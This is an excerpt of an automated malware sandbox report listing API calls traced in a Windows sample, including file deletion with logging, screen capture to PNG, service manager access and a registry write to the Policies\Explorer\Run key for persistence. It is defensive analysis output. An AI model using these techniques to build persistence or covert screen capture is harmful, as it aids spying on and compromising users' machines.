                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?), ref: 0040CEDE
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?), ref: 0040CEEF
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF03
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,004135D8), ref: 0040CF19
                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6C995E08), ref: 0040CF35
                                                • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040CF40
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A), ref: 0040CF53
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040CF5F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF6B
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040CF7D
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040CF86
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040CF9C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$?c_str@?$basic_string@$V01@@$D@1@@Filewcscpy$?length@?$basic_string@FindG@1@@V10@V10@0@V10@@wcscat$?begin@?$basic_string@DirectoryRemove$??2@??4?$basic_string@??8std@@?end@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@AttributesCloseDeleteFirstG@2@@0@LocalNextTimeV01@printf
                                                • String ID: Deleted file: $Unable to delete: $[ERROR]$[INFO]
                                                • API String ID: 1518591422-1234827951
                                                • Opcode ID: 6830387a61e3ed70f70d5bd436e76ef107abfe9006262fa58bdd639802cc9299
                                                • Instruction ID: 8eecb533a296c3ad615e214839620b8ad24914488308803643118c7b387faa75
                                                • Opcode Fuzzy Hash: 6830387a61e3ed70f70d5bd436e76ef107abfe9006262fa58bdd639802cc9299
                                                • Instruction Fuzzy Hash: F65121B1910119AFDF04BFA1DC5ADEE773CFB14306F0045AAF506E20A1EB389A45CB69
                                                APIs
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0040FEAA,?,png,00419BC8), ref: 0040FA87
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040FA92
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA9D
                                                  • Part of subcall function 0040F0DF: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040F0F5
                                                  • Part of subcall function 0040F0DF: CreateCompatibleDC.GDI32(00000000), ref: 0040F101
                                                  • Part of subcall function 0040F0DF: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F113
                                                  • Part of subcall function 0040F0DF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F11B
                                                  • Part of subcall function 0040F0DF: CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040F124
                                                  • Part of subcall function 0040F0DF: DeleteDC.GDI32(00000000), ref: 0040F138
                                                  • Part of subcall function 0040F0DF: DeleteDC.GDI32(?), ref: 0040F13D
                                                  • Part of subcall function 0040F0DF: DeleteObject.GDI32(00000000), ref: 0040F140
                                                  • Part of subcall function 0040F0DF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040F367
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040FAC2
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040FAC9
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FAD7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FAE1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 0040FB10
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 0040FB2D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FB43
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040FB50
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040FB69
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040FB70
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FB7D
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FB86
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040FB9B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FBA5
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0040FEAA,?,dat,?,00000000), ref: 0040FBCD
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040FBD8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FBE6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040FBEF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FBFF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC10
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC19
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC22
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC33
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FC3C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Delete$Create$?data@?$basic_string@?size@?$basic_string@CapsCompatibleD@1@@DeviceG@1@@G@2@@0@Hstd@@V10@V?$basic_string@$?length@?$basic_string@AddressBitmapFileLibraryLoadObjectProcV01@@
                                                • String ID: Shlwapi.dll$XKA$dat$image/png$png
                                                • API String ID: 2652402062-4197093803
                                                • Opcode ID: 49a7f85e606ec972f7c93bd4b775efb34281e01f7ecb548ca196269d5eedbdd6
                                                • Instruction ID: 6a4b97af18714654c4f00727cde383db7164cf81f51f446ce14a96cfb34c37c3
                                                • Opcode Fuzzy Hash: 49a7f85e606ec972f7c93bd4b775efb34281e01f7ecb548ca196269d5eedbdd6
                                                • Instruction Fuzzy Hash: 2251CE72900119ABCB05FFE0ED5A9EE7B78FF14306B10817AF506A20A1EF745B49CB58
                                                APIs
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410205
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6C995E04), ref: 0041021D
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410227
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410230
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 00410241
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410250
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000,00000001,00419288,00000000), ref: 00410301
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00419288,00000000), ref: 00410311
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00000000), ref: 0041031E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,00419288,00000000), ref: 0041033F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00419288,00000000), ref: 0041034B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00000000), ref: 00410328
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 0041037B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 00410385
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 004102A3
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                  • Part of subcall function 00410C16: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00419288,?,?,004102C8), ref: 00410C22
                                                  • Part of subcall function 00410C16: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,004102C8), ref: 00410C2F
                                                  • Part of subcall function 00410C16: OpenServiceW.ADVAPI32(00000000,00000000,?,?,004102C8), ref: 00410C37
                                                  • Part of subcall function 00410C16: CloseServiceHandle.ADVAPI32(00000000,?,?,004102C8), ref: 00410C44
                                                  • Part of subcall function 00410C16: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004102C8), ref: 00410C8F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000,00000001,00419288,?), ref: 004103E3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00419288,?), ref: 004103F3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,?), ref: 00410400
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,?), ref: 0041040A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,00419288,?), ref: 00410421
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00419288,?), ref: 0041042D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 0041047D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 00410487
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 0041050E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 00410518
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 00410598
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 004105A2
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000), ref: 00410625
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000), ref: 0041062F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,00419288,00000000), ref: 00410649
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00410660
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 0041069C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00419288,00000000), ref: 004106AD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                                • String ID:
                                                • API String ID: 4151260400-0
                                                • Opcode ID: 602003751ec81ed49b7e1cf6e4bbbb23f45e95e987e04ed0a8341c2b619dc451
                                                • Instruction ID: 66e90415a7dacb65959ad14462164d715d6e760cef8c680516ce79003ec3c066
                                                • Opcode Fuzzy Hash: 602003751ec81ed49b7e1cf6e4bbbb23f45e95e987e04ed0a8341c2b619dc451
                                                • Instruction Fuzzy Hash: 2CC1A6B19002096BDB08FB61DD96DFF373CEB10304F00455EF516A61D2EEB95A98C7AA
                                                APIs
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 00407139
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 00407163
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 004072B1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 004072BB
                                                  • Part of subcall function 0040AB16: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB7C
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407143
                                                  • Part of subcall function 0040AB16: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040AB23
                                                  • Part of subcall function 0040AB16: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(0041409C,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB32
                                                  • Part of subcall function 0040AB16: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB40
                                                  • Part of subcall function 0040AB16: RegSetValueExW.ADVAPI32(80000002,004072D5,00000000,?,00000000,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0040AB53
                                                  • Part of subcall function 0040AB16: RegCloseKey.ADVAPI32(80000002,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB5E
                                                  • Part of subcall function 0040AB16: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB6D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 0040717D
